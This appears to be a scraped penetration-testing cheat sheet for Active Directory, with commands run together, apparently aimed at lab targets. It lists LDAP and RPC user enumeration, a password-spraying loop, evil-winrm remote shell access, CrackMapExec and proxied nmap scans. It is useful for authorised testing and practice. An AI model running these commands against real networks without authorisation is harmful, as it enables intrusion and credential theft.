π₯οΈActive Directory
DNS
LDAP(389)
RPC
WinRM(5985)
SMB(445,139)
CrackMapExec
Last updated
Last updated
dir \\za.tryhackme.com\SYSVOLdir \\<DC IP>\SYSVOLnslookup
server <ip>$dnsip = "<DC IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsipldapsearch -x -H ldap://<ip> -s base namingcontextsldapsearch -x -b "DC=htb,DC=local" -H ldap://10.10.10.161 'objectClass=Person' sAMAccountNamekinit d.klayldapsearch -H ldap://dc.absolute.htb -s base -Y GSSAPI -b "cn=users,dc=absolute,dc=htb" "user" "description"ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "./windapsearch.py --dc-ip 172.16.5.5 -u "" -Uldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"ldapsearch -D 'ldap@support.htb' -w 'password' -b "DC=support,DC=htb" -H ldap://support.htbrpcclient -U '' -N <ip>enumdomusersfor u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
evil-winrm -u user -p password -i <ip>crackmapexec smb 10.10.10.161 --pass-pol -u '' -p ''proxychains nmap -n -Pn -F -sV -sT -oA nmap_results -vvv -iL ${target or targets.txt} -T4 --max-retries 1 --max-rtt-timeout 2s --ttl 50ms --open KRB5CCNAME=svc_smb.ccache ./smbclient.py -k absolute.htb/svc_smb@dc.absolute.htb -target-ip 10.10.11.181